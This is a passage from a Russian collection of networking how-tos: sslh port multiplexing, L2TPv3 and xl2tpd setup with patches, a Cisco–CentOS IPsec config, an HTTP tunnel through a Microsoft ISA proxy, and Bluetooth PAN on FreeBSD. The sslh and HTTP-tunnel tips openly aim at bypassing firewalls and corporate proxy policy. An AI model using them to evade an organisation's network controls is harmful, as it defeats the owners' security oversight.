XXX.XXX.XXX.XXX", в другой - "ping 192.168.254.2": tcpdump -i ep1 -n host XXX.XXX.XXX.XXX listening on ep1, link-type EN10MB (Ethernet), capture size 65535 bytes 17:34:49.316449 IP 192.168.203.3.4500 > XXX.XXX.XXX.XXX.57488: isakmp-nat-keep-alive 17:34:50.578734 IP XXX.XXX.XXX.XXX.57488 > 192.168.203.3.4500: isakmp-nat-keep-alive 17:35:06.825124 IP 192.168.203.3.4500 > XXX.XXX.XXX.XXX.57488: UDP-encap: ESP(spi=0xeb199561,seq=0x1), length 132 17:35:07.826283 IP 192.168.203.3.4500 > XXX.XXX.XXX.XXX.57488: UDP-encap: ESP(spi=0xeb199561,seq=0x2), length 132 17:35:08.827392 IP 192.168.203.3.4500 > XXX.XXX.XXX.XXX.57488: UDP-encap: ESP(spi=0xeb199561,seq=0x3), length 132 17:35:09.094268 IP XXX.XXX.XXX.XXX.57488 > 192.168.203.3.4500: UDP-encap: ESP(spi=0xc34f704e,seq=0x1), length 132 17:35:09.154359 IP XXX.XXX.XXX.XXX.57488 > 192.168.203.3.4500: UDP-encap: ESP(spi=0xc34f704e,seq=0x2), length 132 17:35:09.194508 IP XXX.XXX.XXX.XXX.57488 > 192.168.203.3.4500: UDP-encap: ESP(spi=0xc34f704e,seq=0x3), length 132 17:35:09.828539 IP 192.168.203.3.4500 > XXX.XXX.XXX.XXX.57488: UDP-encap: ESP(spi=0xeb199561,seq=0x4), length 132 17:35:09.953676 IP XXX.XXX.XXX.XXX.57488 > 192.168.203.3.4500: UDP-encap: ESP(spi=0xc34f704e,seq=0x4), length 132 17:35:10.503650 IP XXX.XXX.XXX.XXX.57488 > 192.168.203.3.4500: isakmp-nat-keep-alive 17:35:10.829664 IP 192.168.203.3.4500 > XXX.XXX.XXX.XXX.57488: UDP-encap: ESP(spi=0xeb199561,seq=0x5), length 132 17:35:10.954139 IP XXX.XXX.XXX.XXX.57488 > 192.168.203.3.4500: UDP-encap: ESP(spi=0xc34f704e,seq=0x5), length 132 17:35:30.327819 IP 192.168.203.3.4500 > XXX.XXX.XXX.XXX.57488: isakmp-nat-keep-alive 17:35:31.118437 IP XXX.XXX.XXX.XXX.57488 > 192.168.203.3.4500: isakmp-nat-keep-alive 17:35:50.332414 IP 192.168.203.3.4500 > XXX.XXX.XXX.XXX.57488: isakmp-nat-keep-alive 17:35:52.174896 IP XXX.XXX.XXX.XXX.57488 > 192.168.203.3.4500: isakmp-nat-keep-alive

Мультиплексирование ssl/ssh соединений через один 443 порт (доп. ссылка 1) [комментарии]

В рамках проекта sslh (http://www.rutschle.net/tech/sslh.shtml) развивается мультиплексор ssl/ssh соединений, способный принимать соединения на одном порту и перебрасывать их в зависимости от типа протокола. Поддерживается широкий спектр протоколов, среди которых HTTP, HTTPS, SSH, OpenVPN, tinc и XMPP. Наиболее востребованным применением sslh является обход межсетевых экранов, допускающих только ограниченное число открытых портов. Например, запустив sslh за пределами межсетевого экрана на 443 порту, можно организовать работу SSH и любых других протоколов: соединение с внешней системы будет производиться на 443 порт, но пробрасываться на локальный 22 порт, при этом штатные HTTPS-запросы будут перебрасываться на localhost:443. Для обеспечения работы такой схемы sslh следует запустить с опциями: sslh --user sslh --listen 192.168.10.15:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 где, "--user sslh" определяет пользователя, под которым следует запустить sslh; "--listen 192.168.10.15:443" - IP и порт для приёма внешних соединений; "--ssh 127.0.0.1:22" - IP и порт для проброса SSH "--ssl 127.0.0.1:443" - IP и порт для проброса HTTPS

Проброс 802.1q/access порта в Linux через IP-сеть Автор: Roman Timofeev [комментарии]

В 2007 году я написал заметку с похожим названием. Тогда использовалась userspace-реализация с tap-интерфейсом и демоном vtund. Особой производительностью этот вариант не отличался. В свежих ядрах Linux появилась поддержка l2tpv3 ethernet pseudowire. Организуем l2-линк с udp-инкапсуляцией между двумя хостами laptus и gw: laptus# ip l2tp add tunnel tunnel_id 1 peer_tunnel_id 1 udp_sport 5000 \\ udp_dport 5000 encap udp local 192.168.1.39 remote 213.x.x.x laptus# ip l2tp add session tunnel_id 1 session_id 1 peer_session_id 1 laptus# ip a a 192.168.30.2/24 dev l2tpeth0 gw# ip l2tp add tunnel tunnel_id 1 peer_tunnel_id 1 udp_sport 5000 \\ udp_dport 11932 encap udp local 213.x.x.x remote 188.134.x.x gw# ip l2tp add session tunnel_id 1 session_id 1 peer_session_id 1 gw# ip a a 192.168.30.1/24 dev l2tpeth0 (так как машина laptus на NAT, то пришлось сначала сконфигурировать туннель на нём и запустить ping 192.168.30.1 и на внешнем интерфейсе gw "подсмотреть" ip:port, в который оттранслировались пакеты на выходе. Если у вас на обоих концах публичные ip - всё просто). Теперь попробуем сделать что-то полезное: laptus# ip link add link l2tpeth0 name vlan5 type vlan id 5 laptus# ip link add link l2tpeth0 name vlan6 type vlan id 6 laptus# ip a a dev vlan5 10.1.5.2/24 laptus# ip a a dev vlan6 10.1.6.2/24 gw# ip link add link l2tpeth0 name vlan5 type vlan id 5 gw# ip link add link l2tpeth0 name vlan6 type vlan id 6 gw# ip a a dev vlan5 10.1.5.1/24 gw# ip a a dev vlan6 10.1.6.1/24 laptus# ping 10.1.6.1 PING 10.1.6.1 (10.1.6.1) 56(84) bytes of data. 64 bytes from 10.1.6.1: icmp_req=1 ttl=64 time=5.77 ms 64 bytes from 10.1.6.1: icmp_req=2 ttl=64 time=13.4 ms 64 bytes from 10.1.6.1: icmp_req=3 ttl=64 time=17.6 ms ^C --- 10.1.6.1 ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2002ms rtt min/avg/max/mdev = 5.776/12.295/17.671/4.922 ms при этом tcpdump -e -n -i l2tpeth0 на gw покажет: 16:44:30.055082 b2:19:70:63:90:85 > 76:a9:12:12:c7:30, ethertype IPv4 (0x0800), length 98: 192.168.30.2 > 192.168.30.1: ICMP echo request, id 26927, seq 1376, length 64 16:44:30.055116 76:a9:12:12:c7:30 > b2:19:70:63:90:85, ethertype IPv4 (0x0800), length 98: 192.168.30.1 > 192.168.30.2: ICMP echo reply, id 26927, seq 1376, length 64 16:44:30.990689 b2:19:70:63:90:85 > 76:a9:12:12:c7:30, ethertype 802.1Q (0x8100), length 102: vlan 6, p 0, ethertype IPv4, 10.1.6.2 > 10.1.6.1: ICMP echo request, id 27037, seq 2, length 64 16:44:30.990734 76:a9:12:12:c7:30 > b2:19:70:63:90:85, ethertype 802.1Q (0x8100), length 102: vlan 6, p 0, ethertype IPv4, 10.1.6.1 > 10.1.6.2: ICMP echo reply, id 27037, seq 2, length 64 l2tpeth можно объединить бриджом с физическим интерфейсом. выглядит это примерно так: root@atomus:~# ip a s l2tpeth0 7: l2tpeth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master vl0 state UNKNOWN qlen 1000 link/ether 1e:7f:ec:bd:cf:6a brd ff:ff:ff:ff:ff:ff root@atomus:~# ip a s vl0 9: vl0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP link/ether 1e:7f:ec:bd:cf:6a brd ff:ff:ff:ff:ff:ff inet 10.1.1.10/24 brd 10.1.1.255 scope global vl0 root@atomus:~# ip a s vlan5 11: vlan5@vl0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP link/ether 1e:7f:ec:bd:cf:6a brd ff:ff:ff:ff:ff:ff inet 10.1.5.10/24 brd 10.1.5.255 scope global vlan5 root@atomus:~# ip a s vlan222 12: vlan222@vl0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP link/ether 1e:7f:ec:bd:cf:6a brd ff:ff:ff:ff:ff:ff inet 10.1.222.10/24 brd 10.1.222.255 scope global vlan222 root@atomus:~# brctl show bridge name bridge id STP enabled interfaces vl0 8000.1e7fecbdcf6a no l2tpeth0 root@gw:~# ip a s vlan222 68: vlan222@l2tpeth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1488 qdisc noqueue state UP link/ether c6:8c:43:30:88:03 brd ff:ff:ff:ff:ff:ff inet 10.1.222.1/24 brd 10.1.222.255 scope global vlan222 root@gw:~# ip a s l2tpeth0 64: l2tpeth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000 link/ether c6:8c:43:30:88:03 brd ff:ff:ff:ff:ff:ff inet 10.1.1.1/24 brd 10.1.1.255 scope global l2tpeth0 root@atomus:~# ping 10.1.5.1 PING 10.1.5.1 (10.1.5.1) 56(84) bytes of data. 64 bytes from 10.1.5.1: icmp_req=1 ttl=64 time=6.37 ms 64 bytes from 10.1.5.1: icmp_req=2 ttl=64 time=5.53 ms ...... root@atomus:~# ping 10.1.222.1 PING 10.1.222.1 (10.1.222.1) 56(84) bytes of data. 64 bytes from 10.1.222.1: icmp_req=1 ttl=64 time=10.0 ms 64 bytes from 10.1.222.1: icmp_req=2 ttl=64 time=4.24 ms ..... Как видим, к нам приходит тегированный трафик: root@gw:~# tcpdump -n -e -i l2tpeth0 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on l2tpeth0, link-type EN10MB (Ethernet), capture size 65535 bytes 19:21:33.962979 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype 802.1Q (0x8100), length 102: vlan 5, p 0, ethertype IPv4, 10.1.5.10 > 10.1.5.1: ICMP echo request, id 3765, seq 139, length 64 19:21:33.963047 c6:8c:43:30:88:03 > 1e:7f:ec:bd:cf:6a, ethertype 802.1Q (0x8100), length 102: vlan 5, p 0, ethertype IPv4, 10.1.5.1 > 10.1.5.10: ICMP echo reply, id 3765, seq 139, length 64 19:21:33.986660 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype 802.1Q (0x8100), length 102: vlan 222, p 0, ethertype IPv4, 10.1.222.10 > 10.1.222.1: ICMP echo request, id 3764, seq 149, length 64 19:21:33.986698 c6:8c:43:30:88:03 > 1e:7f:ec:bd:cf:6a, ethertype 802.1Q (0x8100), length 102: vlan 222, p 0, ethertype IPv4, 10.1.222.1 > 10.1.222.10: ICMP echo reply, id 3764, seq 149, length 64 19:21:35.165848 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype 802.1Q (0x8100), length 102: vlan 5, p 0, ethertype IPv4, 10.1.5.10 > 10.1.5.1: ICMP echo request, id 3765, seq 140, length 64 19:21:35.165903 c6:8c:43:30:88:03 > 1e:7f:ec:bd:cf:6a, ethertype 802.1Q (0x8100), length 102: vlan 5, p 0, ethertype IPv4, 10.1.5.1 > 10.1.5.10: ICMP echo reply, id 3765, seq 140, length 64 19:21:35.168489 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype 802.1Q (0x8100), length 102: vlan 222, p 0, ethertype IPv4, 10.1.222.10 > 10.1.222.1: ICMP echo request, id 3764, seq 150, length 64 ... а тут уже тегов нет: root@gw:~# tcpdump -n -e -i vlan5 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on vlan5, link-type EN10MB (Ethernet), capture size 65535 bytes 19:22:17.038686 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype IPv4 (0x0800), length 98: 10.1.5.10 > 10.1.5.1: ICMP echo request, id 3765, seq 182, length 64 19:22:17.038759 c6:8c:43:30:88:03 > 1e:7f:ec:bd:cf:6a, ethertype IPv4 (0x0800), length 98: 10.1.5.1 > 10.1.5.10: ICMP echo reply, id 3765, seq 182, length 64 19:22:18.041890 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype IPv4 (0x0800), length 98: 10.1.5.10 > 10.1.5.1: ICMP echo request, id 3765, seq 183, length 64 19:22:18.041935 c6:8c:43:30:88:03 > 1e:7f:ec:bd:cf:6a, ethertype IPv4 (0x0800), length 98: 10.1.5.1 > 10.1.5.10: ICMP echo reply, id 3765, seq 183, length 64 root@gw:~# tcpdump -n -e -i vlan222 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on vlan222, link-type EN10MB (Ethernet), capture size 65535 bytes 19:23:14.155061 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype IPv4 (0x0800), length 98: 10.1.222.10 > 10.1.222.1: ICMP echo request, id 3764, seq 249, length 64 19:23:14.155100 c6:8c:43:30:88:03 > 1e:7f:ec:bd:cf:6a, ethertype IPv4 (0x0800), length 98: 10.1.222.1 > 10.1.222.10: ICMP echo reply, id 3764, seq 249, length 64 19:23:15.150799 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype IPv4 (0x0800), length 98: 10.1.222.10 > 10.1.222.1: ICMP echo request, id 3764, seq 250, length 64 19:23:15.150833 c6:8c:43:30:88:03 > 1e:7f:ec:bd:cf:6a, ethertype IPv4 (0x0800), length 98: 10.1.222.1 > 10.1.222.10: ICMP echo reply, id 3764, seq 250, length 64 если требуется "протащить" несколько trunk-интерфейсов, то достаточно сказать: ip l2tp add session tunnel_id 1 session_id 2 peer_session_id 2 В рамках одно туннеля может быть 65535 сессий.

Подключения к Internet Beeline (Corbina) в Debian GNU/Linux 6 по протоколу l2tp (доп. ссылка 1) Автор: Ilya [комментарии]

Руководство по настройке подключения к провайдеру Beeline (Corbina) в Debian 6 по протоколу l2tp. 1. Локальное подключение: Ethernet 100Mb. Настройки по DHCP (локальный IP, маршруты, DNS серверы). 2. Подключение к Internet: по протоколу l2tp через сервер tp.internet.beeline.ru. 1.1. "Ловим" маршруты (у меня больше 30): В связи с увлеченностью Beeline технологиями от MS придется подправить dhclient.conf, заменяем option rfc3442-classless-static-routes code 121 = array of unsigned integer 8; на option rfc3442-classless-static-routes code 249 = array of unsigned integer 8; далее добавляем в секцию "request" опцию "static-routes", а в директорию "/etc/dhcp/dhclient-exit-hooks.d/" скрипт (назовем его "static_routes"): RUN="yes" if [ "$RUN" = "yes" ]; then if [ "$new_static_routes" != "" ]; then if [ "$reason" = "BOUND" ] || [ "$reason" = "REBOOT" ]; then my_static_routes=($new_static_routes) for(( i=0; i < ${#my_static_routes[@]}; i=i+2 )); do /sbin/route add -host "${my_static_routes[$i]}" gw "${my_static_routes[$i+1]}" done fi fi fi В зтом скрипте я делаю допущение, что через опцию "static_routes" выдаются маршруты только к хостам, не к сетям (для Beeline это верно). Еще один нюанс - после поднятия интерфейса, в "dhclient.ethX.leases", у меня остается адрес сервера dhcp недостижимый по протоколу dhcp. Поэтому по истечению времени "renew" (у меня 3 дня) в log начинает сыпаться сообщения о недосягаемости dhcp сервера. Во избежании, добавим опцию: supersede dhcp-server-identifier 255.255.255.255; Получаем что-то типа: option rfc3442-classless-static-routes code 249 = array of unsigned integer 8; supersede dhcp-server-identifier 255.255.255.255; request subnet-mask, broadcast-address, time-offset, routers, static-routes, domain-name, domain-name-servers, domain-search, host-name, netbios-name-servers, netbios-scope, interface-mtu, rfc3442-classless-static-routes, ntp-servers; 1.2. Подымаем интерфейс. Подправляем маршруты. Файл /etc/network/interfaces: iface ethX inet dhcp l2tpserv tp.internet.beeline.ru l2tpgw 10.xxx.xxx.xxx # адрес шлюза - узнается экспериментально. Прописываем маршруты к DNS и к tp.internet.beeline.ru. Файл /etc/network/if-up.d/prel2tp: название может быть любое: #!/bin/sh BINROUTE=/sbin/route if [ "x$IF_L2TPSERV" != "x" -a "x$IF_L2TPGW" != "x" ] then for i in $(grep "^nameserver" /etc/resolv.conf | awk '{print $2}') ; do $BINROUTE add -host $i gw $IF_L2TPGW done $BINROUTE add -host $IF_L2TPSERV gw $IF_L2TPGW fi exit 0 2.1. openl2tp vs. xl2tpd. openl2tp работает быстрее, ping (меньше и стабильней), но вечерами отваливается и уже после этого не подымается до поздней ночи. Еще пару раз при неудачной последовательности запуска вешал ядро. В общем сыроват. xl2tpd(l2tpd) - ужасный код, но легко читается и правится, нагрузка на CPU (с отключенным DEBUG 1-2 %), работает стабильно, при обрывах переподключается самостоятельно, маленький. Мой выбор xl2tpd. 2.2. Настройка xl2tpd. В процессе тестирования, мной обнаружены ошибки влияющие на стабильность. Поэтому рекомендую пропатчить xl2tpd. 1. http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=611829 2. Кого раздражает в "syslog" "write_packet: Resource temporarily unavailable(11)". Также, заплатка уменьшает вероятность потери пакета. Патч l2tp-offsetpad-error.patch: --- xl2tpd-1.2.7+dfsg.orig/network.c +++ xl2tpd-1.2.7+dfsg/network.c @@ -153,7 +153,7 @@ inline void fix_hdr (void *buf) { int len = 6; if (PSBIT (ver)) - len += 4; + len += 2; if (PLBIT (ver)) len += 2; if (PFBIT (ver)) --- xl2tpd-1.2.7+dfsg.orig/control.c +++ xl2tpd-1.2.7+dfsg/control.c @@ -1299,7 +1299,7 @@ inline int check_payload (struct buffer } } */ if (PSBIT (h->ver)) - ehlen += 4; /* Offset information */ + ehlen += 2; /* Offset information */ if (PLBIT (h->ver)) ehlen += h->length; /* include length if available */ if (PVER (h->ver) != VER_L2TP) @@ -1365,7 +1365,7 @@ inline int expand_payload (struct buffer if (!PFBIT (h->ver)) ehlen += 4; /* Should have Ns and Nr too */ if (!PSBIT (h->ver)) - ehlen += 4; /* Offset information */ + ehlen += 2; /* Offset information */ if (ehlen) { /* @@ -1410,13 +1410,13 @@ inline int expand_payload (struct buffer { r++; new_hdr->o_size = *r; - r++; - new_hdr->o_pad = *r; +// r++; +// new_hdr->o_pad = *r; } else { new_hdr->o_size = 0; - new_hdr->o_pad = 0; +// new_hdr->o_pad = 0; } } else @@ -1548,8 +1548,9 @@ inline int write_packet (struct buffer * /* * Skip over header */ - buf->start += sizeof (struct payload_hdr); - buf->len -= sizeof (struct payload_hdr); + _u16 offset = ((struct payload_hdr*)(buf->start))->o_size; // For FIXME: + buf->start += sizeof(struct payload_hdr) + offset; + buf->len -= sizeof(struct payload_hdr) + offset; c->rx_pkts++; c->rx_bytes += buf->len; --- xl2tpd-1.2.7+dfsg.orig/call.c +++ xl2tpd-1.2.7+dfsg/call.c @@ -52,8 +52,8 @@ void add_payload_hdr (struct tunnel *t, buf->start -= sizeof (struct payload_hdr); buf->len += sizeof (struct payload_hdr); /* Account for no offset */ - buf->start += 4; - buf->len -= 4; + buf->start += 2; + buf->len -= 2; if (!c->fbit && !c->ourfbit) { /* Forget about Ns and Nr fields then */ --- xl2tpd-1.2.7+dfsg.orig/l2tp.h +++ xl2tpd-1.2.7+dfsg/l2tp.h @@ -82,7 +82,7 @@ struct payload_hdr _u16 Ns; /* Optional next sent */ _u16 Nr; /* Optional next received */ _u16 o_size; /* Optional offset size */ - _u16 o_pad; /* Optional offset padding */ +// _u16 o_pad; /* Optional offset padding */ } __attribute__((packed)); #define NZL_TIMEOUT_DIVISOR 4 /* Divide TIMEOUT by this and Патч http://ilyx.ru/xl2tpd/wr_pk-nolog-err11.patch: --- xl2tpd-1.2.7+dfsg.orig/control.c +++ xl2tpd-1.2.7+dfsg/control.c @@ -1636,15 +1637,14 @@ inline int write_packet (struct buffer * } #endif - x = write (c->fd, wbuf, pos); - if (x < pos) + x = 0; + while ( pos != 0 ) { - if (DEBUG) + x = write (c->fd, wbuf+x, pos); + if ( x < 0 ) { + if ( errno != EINTR && errno != EAGAIN ) { l2tp_log (LOG_WARNING, "%s: %s(%d)\n", __FUNCTION__, strerror (errno), errno); - - if (!(errno == EINTR) && !(errno == EAGAIN)) - { /* * I guess pppd died. we'll pretend * everything ended normally @@ -1653,6 +1653,12 @@ inline int write_packet (struct buffer * c->fd = -1; return -EIO; } + else { + x = 0; + continue; + } + } + pos = pos - x; } return 0; } Ставим желательно пропатченный xl2tpd. Далее приведу свои файлы конфигураций. xl2tpd.conf: [global] access control = yes [lac beeline] lns = tp.internet.beeline.ru redial = yes redial timeout = 20 pppoptfile = /etc/ppp/options.xl2tpd autodial = yes flow bit = no /etc/ppp/options.xl2tpd: asyncmap 0000 mru 1460 mtu 1460 name xxxxxxxx noaccomp nopcomp novj novjccomp noauth nobsdcomp nodeflate noipx noauth nomp refuse-eap # refuse-chap refuse-pap # refuse-mschap # refuse-mschap-v2 replacedefaultroute defaultroute ipparam l2tp unit 0 /etc/ppp/options: lcp-echo-failure 10 lcp-echo-adaptive lcp-echo-interval 60 демон pppd читает оба файла(options.xl2tpd, options). Не забываем "chap-secrets". Убираем маршрут к "tp.internet.beeline.ru" после старта "pppd" через созданный туннель(спасибо Corbina(Beeline) за адрес l2tp сервера, совпадающий с адресом второго конца туннеля). /etc/ppp/ip-up.d/delroute: #!/bin/sh if [ "x$6" = "xl2tp" ] then route del -host $5 dev $1 fi exit 0 В iptables, как минимум, нужно правило(если работаем как шлюз): $IPTABLES -t mangle -A FORWARD -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu Ну теперь вроде бы все. Прописываем автостарт ethX или ifup ethX, затем "/etc/init.d/xl2tpd start" или автостарт при загрузке. Выключение тоже стандартно "/etc/init.d/xl2tpd stop" ifdown ethX. PS. У меня работает без разрывов сутками, так как компьютер дома, раза два в неделю выключаю. В общем доволен, хотя Beeline, мог бы сделать все по прозрачней для конечного пользователя. Но видимо не хотят. Патчи, сборку пакета для Debian 6 amd64 и оригинал руководства можно скачать здесь.

IPSec туннель между Cisco и CentOS Linux Автор: PsV [комментарии]

Имеем: 1 Маршрутизатор Cisco 5510 ASA с реальным IP 1.1.1.1 (сеть XXX.XXX.0.0/24) 2. Маршрутизатор Linux CentOS 5.2 (ядро 2.6.18-92.el5) с установленным ipsec-tools-0.6.5-13.el5_3.1 и реальным IP 2.2.2.2 (сеть XXX.XXX.0.0/16) Конфигурация на маршрутизаторе Cisco: crypto isakmp policy 5 encr aes authentication pre-share group 2 lifetime 3600 hash sha ! crypto isakmp key SECRETKEY address 2.2.2.2 crypto ipsec security-association lifetime seconds 3600 crypto ipsec transform-set GK esp-aes esp-sha-hmac crypto map IPSec 7 ipsec-isakmp set peer 2.2.2.2 set transform-set GK set pfs group2 match address 666 ! interface GigabitEthernet0/0.1 ip address 1.1.1.1 255.255.255.224 crypto map IPSec ! ip route XXX.XXX.0.0 255.255.255.0 2.2.2.2 access-list 666 remark asGK access-list 666 permit ip XXX.XXX.0.0 0.0.255.255 XXX.XXX.0.0 0.0.0.255 access-list 666 deny ip any any Конфигурация на машине с Linux CentOS: /etc/sysconfig/network-scripts/ifcfg-ipsec0 TYPE=IPSEC ONBOOT=yes IKE_METHOD=PSK IKE_PSK=SECRETKEY IKE_DHGROUP=2 ESP_PROTO=aes AH_PROTO=none AESP_PROTO=hmac-sha1 SRC=2.2.2.2 SRCGW=XXX.XXX.0.100 DSTGW=1.1.1.1 SRCNET=XXX.XXX.0.0/24 DSTNET=XXX.XXX.0/16 DST=1.1.1.1 /etc/racoon/racoon.conf path include "/etc/racoon"; path pre_shared_key "/etc/racoon/psk.txt"; log notify; listen { isakmp 2.2.2.2 [500]; } sainfo address XXX.XXX.0.0/24 any address XXX.XXX.0.0/16 any { pfs_group 2; lifetime time 6400 sec; encryption_algorithm aes; authentication_algorithm hmac_sha1; compression_algorithm deflate; } и не забываем про iptables!! после настройки #ifup ipsec0 после поднятия ipsec0 можно посмотреть есть ли туннель #setkey -D 2.2.2.2 1.1.1.1 esp mode=tunnel spi=3839224802(0xe4d5ebe2) reqid=0(0x00000000) E: aes-cbc c98674dd c1cda3a8 36f39eb5 84fd56b4 192e4acd 7ad470d7 0176919b c955cc38 A: hmac-sha1 d8e6305b 8b0352ab 249d125f 1515e6a8 136d8896 seq=0x00000000 replay=4 flags=0x00000000 state=mature created: Jul 8 10:19:23 2010 current: Jul 8 10:44:57 2010 diff: 1534(s) hard: 86400(s) soft: 69120(s) last: Jul 8 10:19:27 2010 hard: 0(s) soft: 0(s) current: 2160(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 18 hard: 0 soft: 0 sadb_seq=1 pid=8863 refcnt=0 1.1.1.1 2.2.2.2 esp mode=tunnel spi=111533039(0x06a5dbef) reqid=0(0x00000000) E: aes-cbc 3e1f5040 cf6c15d2 8083dc28 aa6006ef df53337f 13b31da2 2782ef5c e46d3567 A: hmac-sha1 a9553dd3 e9b431a5 534baef8 a2b1f34b cc2b8867 seq=0x00000000 replay=4 flags=0x00000000 state=mature created: Jul 8 10:19:23 2010 current: Jul 8 10:44:57 2010 diff: 1534(s) hard: 86400(s) soft: 69120(s) last: Jul 8 10:19:27 2010 hard: 0(s) soft: 0(s) current: 833(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 18 hard: 0 soft: 0 sadb_seq=0 pid=8863 refcnt=0 Ссылки: https://www.opennet.ru/base/cisco/cisco_ipsec_freebsd.txt.html (очень помогла эта статья) http://netbsd.gw.com/cgi-bin/man-cgi?racoon++NetBSD-current

Создание HTTP-туннеля для удаленного доступа к Linux-хосту в обход Microsoft ISA (доп. ссылка 1) [комментарии]

Для организации управления внешней рабочей станцией из корпоративной сети, защищенной Microsoft ISA, можно поднять HTTP-туннель, при помощи которого можно установить TCP-соединение, несмотря на использование HTTP-прокси и жестких политик ограничения доступа на межсетевом экране. Использовать классический пакет GNU HTTPtunnel (http://www.gnu.org/software/httptunnel/) в такой ситуации мешает отсутствие поддержки в данной программе NTLM-аутентифиукации, как правило используемой при организации выхода пользователей в сеть через Microsoft ISA. Выходом в данной ситуации является использование программы BoutDuTunnel (http://boutdutunnel.net/), совместимой с большинством HTTP-прокси, поддерживающей NTLM-аутентифиукацию, способной работать даже при блокировании HTTPS и метода "Connect", содержащей в себе встроенный HTTP-сервер и поддерживающей работу поверх Socks. BoutDuTunnel поддерживает работу из Linux и Windows, при запуске из Linux достаточно установить пакет mono и загрузить готовый исполняемый файл bdtunnel (http://sourceforge.net/projects/bdtunnel/files/). После установки правим на стороне удаленного сервера файл BdtServerCfg.cfg в директории BdtServer, приведя его примерно в такой вид: <service name = "BdtServer" protocol = "Bdt.Shared.Protocol.TcpRemoting" port = "80" /> <users> <имя_пользователя enabled = "true" password = "пароль" admin = "false" stimeout = "12" ctimeout = "1" /> </users> , где name - имя туннеля (должно быть одинаковым на обоих концах туннеля), protocol - тип туннельного протокола, port - номер серверного порта для формирования туннеля. Секция "users" определяет параметры авторизации для создания туннеля и таймауты для сброса неактивных сессий и соединений. После настройки запускаем на стороне удаленного сервера (привилегии суперпользователя нужны для организации приема соединений на 80 порту): sudo mono BdtServer.exe На стороне клиента, находящегося в локальной сети за прокси-сервером, правим файл BdtClientCfg.xml в директории BdtGuiClient, приведя его к виду: <service name="BdtServer" protocol="Bdt.Shared.Protocol.TcpRemoting" address="адрес удаленного сервера" port="80" username="имя пользователя" password="пароль" culture="" /> <port22 enabled="true" shared="false" address="адрес удаленного сервера" port="22" /> Секция port22 определяет проброс 22 порта на удаленный сервер, что позволит использовать протокол SSH или работающие поверх него сервисы, например, rsync, git, NX Client. Запускаем BdtGuiClient.exe, после чего при соединении к localhost по 22 порту будет автоматически произведен переброс на 22 порт удаленного сервера, при этом с точки зрения прокси будет установленно классическое HTTP-соединение, так как на удаленном конце BoutDuTunnel выступает в роли HTTP-сервера, а не использует HTTPS-метод "Connect". Для противников Mono вместо BoutDuTunnel можно рекомендовать имеющийся в стандартных репозиториях Debian/Ubuntu пакет proxytunnel (http://proxytunnel.sourceforge.net/), который также поддерживает NTLM-аутентификацию, но может работать только на Unix-совместимых системах и требует включения метода connect на прокси. Для проброса 22 порта поверх HTTP-прокси при использовании proxytunnel достаточно прописать в файл конфигурации OpenSSH ~/.ssh/config: ProtocolKeepAlives 30 ProxyCommand /usr/bin/proxytunnel --ntlm -p хост_прокси:порт_прокси -u логин -s пароль -d удаленный_сервер:443

Установка PAN-соединения через bluetooth во FreeBSD 7.2 Автор: shurik [комментарии]

Рассказ об организации выхода ноутбутка в сеть через комуникатор Toshiba Portege G810 с Windows Mobile 6.1 на борту, не позволяющий использовать его в качестве gprs-модема, но позволяющий организовать соединение с ПК через bluetooth PAN. В состав FreeBSD 7.2 был включен демон btpand с реализацией поддержки профилей Bluetooth Network Access Point (NAP), Group Ad-hoc Network (GN) и Personal Area Network User (PANU). Связывание комуникатора с ноутбуком через bluetooth я описывать не буду - это хорошо изложено в хендбуке (http://www.freebsd.org/doc/ru/books/handbook/network-bluetooth.html). Для использования btpand нам необходимо знать BD_ADDR не только коммуникатора, но и локального ПК. Узнать его можно так: # hccontrol Read_BD_ADDR BD_ADDR: 00:1a:6b:df:1b:c9 Для удобства добавим BD_ADDR комуниактора и ПК в /etc/bluetooth/hosts: 00:1a:6b:df:1b:c9 hp6710s 00:1b:24:a8:9c:76 g810 Далее все как описано в man 8 btpand: # ifconfig tap0 create # btpand -a g810 -d hp6710s -s NAP -i tap0 btpand[1986]: Searching for NAP service at 00:1b:24:a8:9c:76 btpand[1986]: Found PSM 15 for service NAP btpand[1986]: Opening connection to service 0x1116 at 00:1b:24:a8:9c:76 btpand[1986]: channel_open: (fd#4) btpand[1986]: Using interface tap0 with addr 00:00:6b:df:1b:c9 btpand[1986]: channel_open: (fd#5) # dhclient tap0 DHCPDISCOVER on tap0 to 255.255.255.255 port 67 interval 5 DHCPOFFER from 192.168.0.1 DHCPREQUEST on tap0 to 255.255.255.255 port 67 DHCPACK from 192.168.0.1 bound to 192.168.0.238 -- renewal in 129600 seconds. Все можем работать:)

Ограничение возможностей ssh туннеля при помощи iptables Автор: Avatar [комментарии]

